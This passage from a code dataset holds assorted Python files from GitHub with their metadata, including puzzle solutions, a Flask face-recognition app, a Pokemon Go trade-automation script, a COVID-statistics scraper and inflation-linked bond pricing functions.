)\n\n\nclass TestGetHeadBaseHierLogs(TestCase):\n    def test_normal(self):\n        mock_git = MockGit()\n        mock_git.append_ref(\"main\", MAIN_JSON_LOG)\n        mock_git.append_ref(\"release\", RELEASE_JSON_LOG)\n\n        head, base = get_head_base_hier_logs(mock_git, \"release\", \"main\")\n        self.assertListEqual(\n            list(map(lambda x: x.sha, head)),\n            [\"f\", \"e\"],\n        )\n        self.assertListEqual(\n            list(map(lambda x: x.sha, base)),\n            [\"d\", \"c\"],\n        )\n","repo_name":"MatthiasRieck/gitaudit","sub_path":"tests/test_analysis/test_merge_diff/test_merge_diff.py","file_name":"test_merge_diff.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
{"seq_id":"17008480238","text":"#If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.\n#Find the sum of all the multiples of 3 or 5 below 1000.\n\n#For all numbers that are less than 1000 but are multiples of 3 or 5 we add them to an array\n#We then sum the array elements\n\ny = []\nz = []\ni = 999\n\nwhile 0 < i:\n    y.append(i)\n    i -= 1\n\n#print(y)\n\nfor x in y:\n    if x % 3 == 0 or x % 5 == 0:\n        z.append(x)\n\n#print(z)\n\nans = sum(z)\nprint(ans)\n\n#solved\n#ans = 233168\n","repo_name":"MattKatt2001/Code","sub_path":"Euler/Euler_1.py","file_name":"Euler_1.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"1581069313","text":"# -*- coding=utf-8 -*-\n# python37\nimport os\nfrom webapp.models import User\nfrom webapp.face_handler import get_face_feature\nimport json\nimport time\nfrom webapp import app, db\n\ndb_path = 'webapp/users.db'\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SECRET_KEY'] = 'you-will-never-guess'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, db_path)\n\nif not os.path.isfile(db_path):\n    db.create_all()\n    face_cache = 'FacePhotos'\n    if len(os.listdir(face_cache)) > 0:\n        for index, face_image_file in enumerate(os.listdir(face_cache)):\n            username = face_image_file.split('_')[0]\n            face_image = os.path.join(face_cache, face_image_file)\n            feature = json.dumps(list(get_face_feature(face_image)))\n            user = User(\n                id=int(1000 * time.time()),\n                username=username,\n                feature=feature\n            )\n            db.session.add(user)\n    db.session.commit()\napp.run(debug=True)\n","repo_name":"TitusWongCN/DeepLearning","sub_path":"face_rec_system/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
{"seq_id":"26183454232","text":"'''\nCreated on Feb 14, 2017\n\n@author: Ben Rose\n'''\n\n'''LCS: Longest Common Subsequence (returns the length of the longest common subsequence of two strings)'''\n\ndef LCS(string1,string2):\n    if string1 == '' or string2 == '':\n        return 0\n    elif string1[0] == string2[0]:\n        return 1 + LCS(string1[1:],string2[1:])\n    else:\n        useString1 = LCS(string1,string2[1:])\n        useString2 = LCS(string1[1:],string2)\n        return max(useString1,useString2)\n","repo_name":"benrose258/Python","sub_path":"Python 3.6 Files/Personal Projects/LCSPractice.py","file_name":"LCSPractice.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
{"seq_id":"23058879355","text":"#Trade Script by Misl3d\nfrom zxtouch.client import zxtouch \nfrom zxtouch.touchtypes import *\nimport time\n\n#DEVICE IP \ndevice = zxtouch(\"192.168.1.177\")\n\n#Button 
Coordinates\nTradeButton = (\"600\", \"1150\")\nPokemonSelect = (\"50\", \"450\")\nNextButton = (\"375\", \"1075\")\nConfirmButton = (\"45\", \"680\")\nXButton = (\"375\", \"1230\")\n\n#Button Colors\nTradeButtonColor = (True, {'red': '240', 'green': '255', 'blue': '255'})\nPokemonSelectColor = (True, {'red': '253', 'green': '255', 'blue': '253'})\nNextButtonColor = (True, {'red': '115', 'green': '214', 'blue': '157'})\nConfirmButtonColor = (True, {'red': '105', 'green': '208', 'blue': '146'})\nXButtonColor = (True, {'red': '29', 'green': '133', 'blue': '149'})\n\ndef tap(x,y):\n device.touch(1, 1, x, y) \n device.accurate_usleep(20000)\n device.touch(0, 1, x, y) \ndef pause(milsec):\n device.accurate_usleep(milsec)\ndef Press(Button, Color):\n x = int(Button[0])\n y = int(Button[1])\n result = device.pick_color(x,y)\n\n print(\"Looking for Button\")\n \n while 1:\n result = device.pick_color(x,y)\n if result == Color:\n pause(500000)\n print (\"Found Button! \\n Pressing!\")\n tap(x,y)\n pause(1000000)\n break\ndef trade():\n Press(TradeButton, TradeButtonColor)\n Press(PokemonSelect, PokemonSelectColor)\n Press (NextButton, NextButtonColor) \n Press (ConfirmButton, ConfirmButtonColor)\n Press (XButton, XButtonColor)\n\ndef start():\n print(\"Starting Trade Bot by Misl3d\")\n trades = 0\n maxtrades = int(input(\"How many trades? \\n\"))\n while maxtrades > trades:\n trades += 1 \n print(\"\\n Trade #\" + str(trades))\n trade()\n print(\"\\n Trading Complete!\") \n\nstart()\nexit() \n","repo_name":"Misl3d/PokeGo-ZXTouch","sub_path":"Scripts/Trade.py","file_name":"Trade.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"26903435417","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 24 18:15:12 2022\n\n@author: mlehr\n\"\"\"\n\n#Initialize the Savings Table\nbalance=100 #Balance $100\nintRate=6 #Percent interest/year\nPERCENT=100 #Conversion to decimal representation of %\nstrtYr=0 #Starting Year\nstrtD8=2022 #Date to Start Computations\nnumCmPds=12 #Number of Compounding Periods\ntitlfmt=\"{:^55}\"\nbalfmt=\" ${:>6.2f}{:<20}\"\nprcfmt=\" {:>5.2f}%{:<20}\"\ncolfmt=\"{:>10}{:>10}{:>10}{:>10}\"\nstrfmt=\"{:10}{:10}{:10.2f}{:10.2f}\"\n\n#Computations\nintRate/=PERCENT\nprint(titlfmt.format(\"Savings Table\"))\nprint()\nprint(balfmt.format(balance,\" = Intital Balance $'s\"))\nprint(prcfmt.format(intRate*PERCENT,\" = Interest Rate %\"))\nprint()\nprint(colfmt.format(\"Year\",\"Date\",\"Balance\",\"Interest\"))\nprint(colfmt.format(\"\",\"\",\"Beg of Yr\",\"End of Yr\"))\nprint()\nfor year in range(strtYr,numCmPds+1):\n interest=balance*intRate\n print(strfmt.format(year,strtD8+year,balance,interest))\n balance+=interest","repo_name":"avalazem/Python_83X_Series","sub_path":"FormatSavingsTable.py","file_name":"FormatSavingsTable.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36237294440","text":"import sys\r\n\r\nprint('Advent of Code - Day 1, Challenge 2')\r\n\r\nuCount=0\r\ndCount=0\r\neCount=0\r\nsantaPos=0\r\ncharPos=1\r\n\r\n\r\n#open input file\r\nfile = open('input.txt')\r\n\r\n#read file content and check content length\r\ncontent = file.read()\r\n\r\n#for each character in file count if up, down or error\r\nfor char in content:\r\n\tif char=='(': \r\n\t\tuCount+=1\r\n\t\tsantaPos+=1\r\n\telif char==')':\r\n\t\tdCount+=1\r\n\t\tsantaPos-=1\r\n\telse: eCount+=1\r\n\tif 
santaPos<0:\r\n\t\tprint('Santa has entered the basement due to instruction: ', charPos)\r\n\t\tsys.exit(0)\r\n\tcharPos+=1\r\n#print(uCount,' - ',dCount,' - ',eCount)\r\n\r\n#close input file\r\nfile.close()","repo_name":"mjohnston89/AdventOfCode","sub_path":"2015/Day 01/c2.py","file_name":"c2.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26903373547","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 24 20:09:17 2022\n\n@author: mlehr\n\"\"\"\n\n#Initialize the N in N!\nn=int(input(\"Input n output n!\\n\"))\nif n<=0:\n n=0\nfact=1\n\n#Loop to calculate the factorial\nfor x in range(1,n+1):\n fact*=x\n \n#Output the Factorial\nprint(n,\"! = \",fact)","repo_name":"avalazem/Python_83X_Series","sub_path":"Factorial.py","file_name":"Factorial.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"42726451199","text":"k = int(input())\nl = list()\nfor i in range(k):\n\tyear = 2022\n\ty, c1, c2 = list(map(int, input().split()))\n\twhile True:\n\t\tif (year - y) % c1 == 0 and (year - y) % c2 == 0:\n\t\t\tbreak\n\t\telse:\n\t\t\tyear += 1\n\tl.append(year)\nprint(min(l))","repo_name":"Weiguo-Jiang/Kattis-Solutions","sub_path":"locustlocus.py","file_name":"locustlocus.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"11510359737","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass IndiaStatesSpider(scrapy.Spider):\n name = 'india_states'\n allowed_domains = ['www.mohfw.gov.in']\n start_urls = ['http://www.mohfw.gov.in/']\n\n def parse(self, response):\n rows = response.xpath(\"//table[@class='table table-striped']/tbody/tr[position()<=33]\")\n total_rows = response.xpath(\"//table[@class='table table-striped']/tbody/tr[position()=34]\")\n for row in rows:\n states_no = row.xpath(\".//td[1]/text()\").get()\n states_name = row.xpath(\".//td[2]/text()\").get()\n total_confirmed_cases = row.xpath(\".//td[3]/text()\").get()\n cured_discharged_migrated = row.xpath(\".//td[4]/text()\").get()\n death = row.xpath(\".//td[5]/text()\").get()\n yield {\n 'states_no': states_no,\n 'states_name': states_name,\n 'total_cases': total_confirmed_cases,\n 'cured': cured_discharged_migrated,\n 'death': death\n }\n\n for total in total_rows:\n total_india = total.xpath(\".//td[1]/strong/span/text()\").get()\n total_confirmed_cases_india = total.xpath(\".//td[2]/strong/text()\").get()\n total_cured_discharged_migrated = total.xpath(\".//td[3]/strong/text()\").get()\n total_death = total.xpath(\".//td[4]/strong/text()\").get()\n yield {\n 'total_india': total_india,\n 'country_name': 'India',\n 'total_cases': total_confirmed_cases_india.replace('#', ''),\n 'total_cured': total_cured_discharged_migrated,\n 'total_death': total_death\n }\n","repo_name":"vickyboston20/covid19","sub_path":"covid/spiders/india_states.py","file_name":"india_states.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73008017327","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nfrom pyg_bond._base import rate_format, annual_freq\nfrom pyg_base import dt, drange, ts_gap, years_to_maturity, df_reindex, mul_, add_, pd2np, is_num, loop, is_ts, is_arr, calendar, df_sync, DAY\nfrom pyg_timeseries import 
shift, diff\n\n\n\ndef observations_per_year(ts):\n if not is_ts(ts):\n return np.nan\n observations = len(ts) - 1\n if observations == 0:\n return np.nan\n days = (ts.index[-1] - ts.index[0]).days\n if days < 1:\n return np.nan\n years = days / 365\n f = observations / years\n if f > 300:\n return round(f/365,0) * 365\n elif f > 200:\n return 252 ## business days in a year\n elif f > 150:\n return 182.5\n elif f > 30:\n return round(f/52,0) * 52 ## per week\n elif f > 6:\n return round(f/12,0) * 12\n elif f >2:\n return 4\n else:\n return 1\n\n\ndef as_eom(date):\n return dt(date.year, date.month+1, 0)\n\ndef cpi_reindexed(cpi, ts, gap = None):\n \"\"\"\n Parameters\n ----------\n cpi: constant or a timeseries\n ts: the timeseries on which we wish to evaluate the cpi values\n gap: the gap (in months) between successive cpi indexes values\n \n For most cpi indices, index is published every month.\n \n august cpi is published in september and that return materializes over october to november\n interestingly, this future growth is KNOWN so potentially, future back adjusted calculation is possible\n \n For Australia, months = 3\n \n Example\n -------\n >>> from pyg import *\n >>> cpi = pd.Series(range(82),[date - DAY for date in drange(dt(2003,4,1), dt(0), '3m')])\n >>> ts = pd.Series(1, drange(-6999))\n >>> cpi_reindexed(aucpi, ts) \n \n 2004-07-31 3.989130 ## aim from 3 in June\n 2004-08-01 4.000000\n 2004-08-02 4.010870\n 2004-08-03 4.021739\n 2004-08-04 4.032609\n \n 2023-09-25 80.597826\n 2023-09-26 80.608696\n 2023-09-27 80.619565\n 2023-09-28 80.630435\n 2023-09-29 80.641304 ## aim towards 81 in November\n \n \"\"\"\n if is_ts(cpi):\n n = observations_per_year(cpi)\n if gap is None or gap == 0:\n if n <= 12:\n gap = int(12 /n)\n else:\n return df_reindex(cpi, ts, method = 'ffill')\n else:\n gap = int(gap)\n if n > 12:\n cpi_eom = cpi.resample(f'{gap}m').last()\n dates = [dt(eom+DAY, f'{gap+1}m') for eom in cpi_eom.index]\n else:\n cpi_eom = cpi\n dates = [dt(dt(eom.year, eom.month+1 , 1) if eom.month<12 else dt(eom.year+1, 1, 1), f'{gap+1}m') for eom in cpi_eom.index]\n if isinstance(cpi, pd.DataFrame):\n res = pd.DataFrame(cpi_eom.values, index = dates, columns = cpi_eom.columns)\n else:\n res = pd.Series(cpi_eom.values, index = dates)\n t0 = min(ts.index[0], res.index[0])\n t1 = max(ts.index[-1], res.index[-1])\n extended_dates = drange(dt(t0.year, t0.month, 0), dt(t1.year, t1.month+1,0))\n rtn = df_reindex(df_reindex(res, extended_dates, method = 'linear'), ts)\n return rtn\n else:\n return cpi\n\ndef ilb_ratio(cpi, base_cpi = 1, floor = 1):\n ratio = cpi/base_cpi\n if floor:\n ratio = np.maximum(floor, ratio)\n return ratio\n \ndef ilb_total_return(price, coupon, funding, cpi, base_cpi = None, floor = 1, rate_fmt = 100, \n freq = 2, dirty_correction = True, gap = None):\n \"\"\"\n inflation linked bond clean price is quoted prior to notional multiplication and accrual\n \n So:\n notional = cpi / base_cpi\n carry = daily_accrual - daily_funding\n MTM = notional * dirty price\n change(dirty_price) = change(clean_price) + carry\n\n Using the product rule:\n \n change(MTM) = change(notional * clean_price) + notional * carry + change(notional) * (dirty-clean)\n\n We actually approximate it a little... 
as\n change(MTM) = change(notional * clean_price) + notional * carry + change(notional) * AVG(dirty-clean)\n since\n AVG(dirty-clean) = 0.5 * (coupon / freq) (it grows from 0 to coupon/freq before dropping back to 0)\n \n :Example:\n ---------\n >>> from pyg import * \n >>> coupon = 3\n >>> funding = 1\n >>> price = pd.Series([80, 80, np.nan] * 87 + [80], drange(2001,2002,'1b')) ## \n >>> rate_fmt = 100 \n >>> base_cpi = floor = 1\n >>> cpi = pd.Series(np.arange(1,2+1/261,1./261), drange(2001,2002,'1b'))\n >>> tri = ilb_total_return(price, coupon, funding, base_cpi, cpi, floor = 1, rate_fmt = 100, dirty_correction = False)\n \n The total return in MTM is due to notional doubling due to inflation. \n Price remain constant so MTM going up from 80 to 160.\n \n Carry should be almost exactly: (3 - 0.8) * cpi.mean() == 3.3 ## 3% less funding of 80 at 1%\n \n >>>> assert (tri.sum() - 83.3)<1e-2\n \n \n \"\"\"\n freq = annual_freq(freq)\n rate_fmt = rate_format(rate_fmt)\n mask = np.isnan(price)\n prc = price[~mask]\n dcf = ts_gap(prc)/365 ## day count fraction, forward looking\n notional = cpi_reindexed(cpi, ts = price, gap = gap) \n if base_cpi is None or base_cpi == 0:\n base_cpi = notional[~np.isnan(notional)].iloc[0]\n notional = notional / base_cpi\n finance = (prc/100) * df_reindex(funding, prc, method = ['ffill', 'bfill'])\n notional[mask] = np.nan\n if floor:\n notional = np.maximum(floor, notional)\n carry = df_reindex(shift(mul_([coupon - finance, dcf, notional])), price) ## ## accruals less funding costs on notional\n pv = mul_(price, notional)\n rtn = diff(pv)\n if dirty_correction:\n dirty_change_in_notional = diff(notional) * (coupon / (2 * freq))\n return add_([rtn, (100/rate_fmt) * carry, dirty_change_in_notional])\n else:\n return add_([rtn, (100/rate_fmt) * carry])\n \n\n@pd2np\ndef _ilb_pv_and_durations(nominal_yld, cpi_yld, tenor, coupon, freq = 2):\n \"\"\"\n \n Given \n - yld by which we discount all cash flows,\n - cpi_yld: the growth rate of cpi\n and the usual tenor, coupon, freq defining the cash flows,\n can we determine the pv of an ilb and its derivative wrt both yld and cpi_yld\n \n\n :Present Value calculation:\n --------------------------\n \n There are n = freq * tenor periods\n and a period discount factor, i.e. \n\n d = (1 + yld/freq) [so that paying a coupon of y/freq at end of period, would keep value constant at 1]\n\n On the other hand, there is growth factor g = (1 + cpi_yld/freq) since we get paid based on growth of cpi\n\n g = (1+cpi_yld/freq)\n\n Let f = g / d\n\n and let r = 1/(1-f)\n\n just like a normal bond:\n \n coupons_pv = c f + c * f^2 + ... c * f ^ (freq * tenor) \n = c f * (1+f...+f^(n-1)) \n = c f * (1 - f^n) / (1 - f) = c * f * (1-f^n) * r\n notional_pv = f^n\n \n if yld == cpi_yld and f == 1 then...\n pv = 1 + c * n # n coupons + notional\n \n :duration calculation:\n --------------------------\n we denote p = cpi_yld\n df/dy = - 1/freq * g/d^2 = - f^2 / (freq * g)\n df/dp = = 1/(freq * d) = f / (freq * g) \n \n dr/dy = r^2 df/dy\n dr/dp = r^2 df/dp\n \n \n yield duration\n ---------------\n - dnotional/dy = n f ^ (n-1) df/dy \n - dcoupons/dy = c * df/dy * [(1-f^n)*r - f * n f^n-1 *r + f * (1-f^n) * r^2] # using the product rule\n = c * df/dy * r [(1-f^n) - n * f^n + f(1-f^n)*r] \n\n if yld == cpi_yld and f == 1 then..\n \n dnotional_dy = tenor\n coupons_pv = c f + c * f^2 + ... c * f ^ (freq * tenor) = c * f * (1+f...+f^(n-1)) \n dcoupon_dy/c = df/dy ( 1 + 2f + 3 f^2 ... 
+ nf^(n-1)) \n = df/fy (1+...n) # since f = 1\n = (1/g * freq) n(n+1)/2\n\n cpi duration\n ------------\n The formula is identical, except we replace df/dy with df/dp so we just need to divide by -f\n \n \n Example: ilb calculations match normal bond when cpi_yld = 0\n ---------\n >>> tenor = 10; coupon = 0.02; yld = 0.05; cpi_yld = 0.03; freq = 2\n \n >>> _ilb_pv_and_durations(yld = yld, cpi_yld = 0.00, tenor = tenor, coupon = coupon, freq = freq)\n >>> (0.7661625657152991, 6.857403925710587, 6.690150171424962)\n \n >>> _bond_pv_and_duration(yld = yld, tenor = tenor, coupon = coupon, freq = freq)\n >>> (0.7661625657152991, 6.690150171424962)\n\n Example: ilb calculated duration is same as empirical one\n ---------\n >>> pv3, cpi3, yld3 = _ilb_pv_and_durations(yld = yld, cpi_yld = 0.03, tenor = tenor, coupon = coupon, freq = freq)\n >>> pv301, cpi301, yld301 = _ilb_pv_and_durations(yld = yld, cpi_yld = 0.0301, tenor = tenor, coupon = coupon, freq = freq)\n >>> 1e4 * (pv301 - pv3), 0.5*(cpi301 + cpi3)\n\n\n \"\"\"\n n = tenor * freq\n c = coupon / freq\n if is_arr(nominal_yld):\n nominal_yld[nominal_yld<=-freq] = np.nan\n elif nominal_yld<=-freq:\n nominal_yld = np.nan\n if is_arr(cpi_yld):\n cpi_yld[cpi_yld<=-freq] = np.nan\n elif cpi_yld<=-freq:\n cpi_yld= np.nan\n d = (1 + nominal_yld / freq)\n g = (1 + cpi_yld / freq)\n if is_num(nominal_yld) and is_num(cpi_yld) and nominal_yld == cpi_yld: \n pv = 1 + n * c\n yld_duration = n * (n + 1) / (2 * freq * g)\n cpi_duration = yld_duration\n f = g / d\n dfy = f**2 / (g * freq) ## we ignore the negative sign\n dfp = f / (g * freq)\n fn1 = f ** (n-1) \n r = 1 / (1 - f)\n notional_pv = fn = fn1 * f\n dnotional_dy = n * fn1 * dfy\n dnotional_dp = n * fn1 * dfp\n coupon_pv = c * f * (1 - fn) * r\n pv = notional_pv + coupon_pv\n dcoupon_dy = c * dfy * r * ((1 - fn) - n * fn + f * (1-fn) * r)\n dcoupon_dp = c * dfp * r * ((1 - fn) - n * fn + f * (1-fn) * r)\n yld_duration = dnotional_dy + dcoupon_dy\n cpi_duration = dnotional_dp + dcoupon_dp\n if isinstance(nominal_yld, (pd.Series, pd.DataFrame, np.ndarray)):\n mask = f == 1\n pv0 = 1 + n * c\n duration0 = tenor + c*n*(n+1)/(2*freq*g)\n pv[mask] = pv0 if is_num(pv0) else pv0[mask]\n yld_duration[mask] = duration0 if is_num(duration0) else duration0[mask]\n cpi_duration[mask] = duration0 if is_num(duration0) else duration0[mask]\n return pv, cpi_duration, yld_duration\n\n\ndef ilb_pv(nominal_yld, cpi_yld, tenor, coupon, freq = 2, rate_fmt = None):\n \"\"\"\n Given \n - nominal_yld by which we discount all cash flows,\n - cpi_yld: the growth rate of cpi\n \n and the usual tenor, coupon, freq defining the cash flows,\n can we determine the pv of an ilb and its derivative wrt both yld and cpi_yld\n \n \n Example:\n --------\n cpi_yld = ilb_cpi_yld(100, )\n \n\n :Present Value calculation:\n --------------------------\n \n There are n = freq * tenor periods\n and a period discount factor, i.e. \n\n d = (1 + nominal_yld/freq) [so that paying a coupon of y/freq at end of period, would keep value constant at 1]\n\n On the other hand, there is growth factor g = (1 + cpi_yld/freq) since we get paid based on growth of cpi\n\n g = (1+cpi_yld/freq)\n\n Let f = g / d\n\n and let r = 1/(1-f)\n\n just like a normal bond:\n \n coupons_pv = c f + c * f^2 + ... 
c * f ^ (freq * tenor) \n = c f * (1+f...+f^(n-1)) \n = c f * (1 - f^n) / (1 - f) = c * f * (1-f^n) * r\n notional_pv = f^n\n \n if nominal_yld == cpi_yld and f == 1 then...\n pv = 1 + c * n # n coupons + notional\n \n :duration calculation:\n ----------------------\n we denote p = cpi_yld and y = yld = nominal_yld\n \n f = g/d = (1+p/freq)/(1+y/freq)\n df/dy = - 1/freq * g/d^2 = - f^2 / (freq * g)\n df/dp = 1/(freq * d) = f / (freq * g) \n \n dr/dy = r^2 df/dy\n dr/dp = r^2 df/dp\n \n nominal yield duration\n ---------------\n - dnotional/dy = n f ^ (n-1) df/dy \n - dcoupons/dy = c * df/dy * [(1-f^n)*r - f * n f^n-1 *r + f * (1-f^n) * r^2] # using the product rule\n = c * df/dy * r [(1-f^n) - n * f^n + f(1-f^n)*r] \n\n if yld == cpi_yld and f == 1 then..\n \n dnotional_dy = tenor\n coupons_pv = c f + c * f^2 + ... c * f ^ (freq * tenor) = c * f * (1+f...+f^(n-1)) \n dcoupon_dy/c = df/dy ( 1 + 2f + 3 f^2 ... + nf^(n-1)) \n = df/fy (1+...n) # since f = 1\n = (1/g * freq) n(n+1)/2\n\n cpi duration\n ------------\n The formula is identical, except we replace df/dy with df/dp so we just need to divide by -f\n \n Example: ilb calculations match normal bond when cpi_yld = 0\n ---------\n >>> tenor = 10; coupon = 0.02; yld = 0.05; cpi_yld = 0.03; freq = 2\n \n >>> _ilb_pv_and_durations(yld = yld, cpi_yld = 0.00, tenor = tenor, coupon = coupon, freq = freq)\n >>> (0.7661625657152991, 6.857403925710587, 6.690150171424962)\n \n >>> _bond_pv_and_duration(yld = yld, tenor = tenor, coupon = coupon, freq = freq)\n >>> (0.7661625657152991, 6.690150171424962)\n\n Example: ilb calculated duration is same as empirical one\n ---------\n >>> pv3, cpi3, yld3 = _ilb_pv_and_durations(yld = yld, cpi_yld = 0.03, tenor = tenor, coupon = coupon, freq = freq)\n >>> pv301, cpi301, yld301 = _ilb_pv_and_durations(yld = yld, cpi_yld = 0.0301, tenor = tenor, coupon = coupon, freq = freq)\n >>> 1e4 * (pv301 - pv3), 0.5*(cpi301 + cpi3)\n\n\n \"\"\"\n freq = annual_freq(freq)\n rate_fmt = rate_format(rate_fmt)\n nominal_yld, cpi_yld = df_sync([nominal_yld, cpi_yld])\n if rate_fmt!=1:\n nominal_yld, cpi_yld, coupon = nominal_yld/rate_fmt, cpi_yld/rate_fmt, coupon/rate_fmt \n tenor = years_to_maturity(tenor, cpi_yld)\n pv, cpi_duration, yld_duration = _ilb_pv_and_durations(nominal_yld, cpi_yld, tenor = tenor, coupon = coupon, freq = freq)\n px = pv * 100\n return px\n \ndef ilb_yld_duration(nominal_yld, cpi_yld, tenor, coupon, freq = 2, rate_fmt = None):\n freq = annual_freq(freq)\n rate_fmt = rate_format(rate_fmt)\n nominal_yld, cpi_yld = df_sync([nominal_yld, cpi_yld])\n if rate_fmt!=1:\n nominal_yld, cpi_yld, coupon = nominal_yld/rate_fmt, cpi_yld/rate_fmt, coupon/rate_fmt \n tenor = years_to_maturity(tenor, cpi_yld)\n pv, cpi_duration, yld_duration = _ilb_pv_and_durations(nominal_yld, cpi_yld, tenor = tenor, coupon = coupon, freq = freq)\n return yld_duration\n \n\ndef ilb_cpi_duration(nominal_yld, cpi_yld, tenor, coupon, freq = 2, rate_fmt = None):\n freq = annual_freq(freq)\n rate_fmt = rate_format(rate_fmt)\n nominal_yld, cpi_yld = df_sync([nominal_yld, cpi_yld])\n if rate_fmt!=1:\n nominal_yld, cpi_yld, coupon = nominal_yld/rate_fmt, cpi_yld/rate_fmt, coupon/rate_fmt \n tenor = years_to_maturity(tenor, cpi_yld)\n pv, cpi_duration, yld_duration = _ilb_pv_and_durations(nominal_yld, cpi_yld, tenor = tenor, coupon = coupon, freq = freq)\n return cpi_duration\n\n\ndef _ilb_cpi_yld_and_duration(price, nominal_yld, tenor, coupon, freq = 2, iters = 5):\n \"\"\"\n\t\n We calculate break-even yield for a bond, given its price, 
the yield of a normal government bond and tenor and coupons...\t\n We expect price to be quoted as per usual in market, i.e. 100 being par value. However, coupon and yield should be in fed actual values.\n\n Parameters\n ----------\n price : float/array\n clean price of an inflation linked bond\n nominal_yld: float/array\n The yield of a vanilla government bond, used as a reference for discounting cash flows\n tenor : int\n tenor of a bond.\n coupon : float, optional\n coupon of a bond. The default is 0.06.\n freq : int, optional\n number of coupon payments per year. The default is 2.\n iters : int, optional\n Number of iterations to find yield. The default is 5.\n\n Returns\n -------\n\treturns a dict of the following keys:\n\t\n yld : number/array\n the yield of the bond\n\tduration: number/array \n\t\tthe duration of the bond. Note that this is POSITIVE even though the dPrice/dYield is negative\n \"\"\"\n px = price /100\n cpi_yld = 0\n for _ in range(1+iters):\n pv, cpi_duration, yld_duration = _ilb_pv_and_durations(nominal_yld, cpi_yld, tenor, coupon, freq = freq)\n cpi_yld = cpi_yld + (px - pv) / cpi_duration\n return dict(cpi_yld = cpi_yld, cpi_duration = cpi_duration, yld_duration = yld_duration)\n\n_ilb_cpi_yld_and_duration.output = ['cpi_yld', 'cpi_duration', 'yld_duration']\n\n_ilb_cpi_yld_and_duration_ = loop(pd.DataFrame, pd.Series)(_ilb_cpi_yld_and_duration)\n\n\ndef ilb_cpi_yld_and_duration(price, nominal_yld, tenor, coupon, freq = 2, iters = 5, rate_fmt = None):\n \"\"\"\n calculates both cpi_yield and cpi_duration from a maturity date or a tenor.\n cpi_yld is the breakeven yield inflation that matches the prices with vanilla bond.\n\n Parameters\n ----------\n price : float/array\n price of bond\n nominal_yld: float/array\n yield of a NOMINAL bond with similar maturity\n tenor: int, date, array\n if a date, will calculate \n coupon : float, optional\n coupon of a bond. The default is 0.06.\n freq : int, optional\n number of coupon payments per year. The default is 2.\n iters : int, optional\n Number of iterations to find yield. The default is 5.\n\n Returns\n -------\n res : dict\n cpi_yld and cpi_duration.\n \n Example:\n --------\n >>> cpi_yld = ilb_cpi_yld(84, nominal_yld = 0.04, tenor = 10, coupon = 0.01, cpi = 1.3, base_cpi = 1)\n >>> px = ilb_pv(nominal_yld = 0.04, cpi_yld = res['cpi_yld'], tenor = 10, coupon = 0.01)\n >>> assert abs(px-84)<1e-6\n \"\"\"\n freq = annual_freq(freq)\n rate_fmt = rate_format(rate_fmt)\n price, nominal_yld = df_sync([price, nominal_yld])\n tenor = years_to_maturity(tenor, price)\n if rate_fmt == 1: \n return _ilb_cpi_yld_and_duration_(price, nominal_yld, tenor, coupon, freq = freq, iters = iters)\n else:\n res = _ilb_cpi_yld_and_duration_(price = price, \n nominal_yld = nominal_yld/rate_fmt, tenor = tenor, coupon = coupon/rate_fmt, \n freq = freq, iters = iters)\n res['cpi_yld'] *= rate_fmt\n return res\n\nilb_cpi_yld_and_duration.output = _ilb_cpi_yld_and_duration.output \n\n\ndef ilb_cpi_yld(price, nominal_yld, tenor, coupon, freq = 2, iters = 5, rate_fmt = None):\n \"\"\"\n\t\n\tbond_yld calculates yield from price iteratively using Newton Raphson gradient descent.\n\t\n We expect price to be quoted as per usual in market, i.e. 100 being par value. However, coupon and yield should be in fed actual values.\n\n Parameters\n ----------\n price : float/array\n price of bond\n tenor : int\n tenor of a bond.\n coupon : float, optional\n coupon of a bond. The default is 0.06.\n freq : int, optional\n number of coupon payments per year. 
The default is 2.\n iters : int, optional\n Number of iterations to find yield. The default is 5.\n rate_fmt: how you prefer to quote rates: 1 = 6% is represented as 0.06, 100 = 6% is represented as 6.\n\n Returns\n -------\n yld : number/array\n the yield of the bond\n \"\"\"\n\n return ilb_cpi_yld_and_duration(price = price, nominal_yld = nominal_yld, \n tenor = tenor, coupon = coupon, freq = freq, iters = iters, \n rate_fmt = rate_fmt)['cpi_yld']\n\n\n\n\n","repo_name":"gityoav/pyg-bond","sub_path":"src/pyg_bond/_ilb.py","file_name":"_ilb.py","file_ext":"py","file_size_in_byte":19456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34198158767","text":"class CQueue:\r\n def __init__(self):\r\n self.stack1 = []\r\n self.stack2 = []\r\n self.size = 0\r\n\r\n def appendTail(self, value: int) -> None:\r\n while self.stack1:\r\n self.stack2.append(self.stack1.pop())\r\n\r\n self.stack1.append(value)\r\n while self.stack2:\r\n 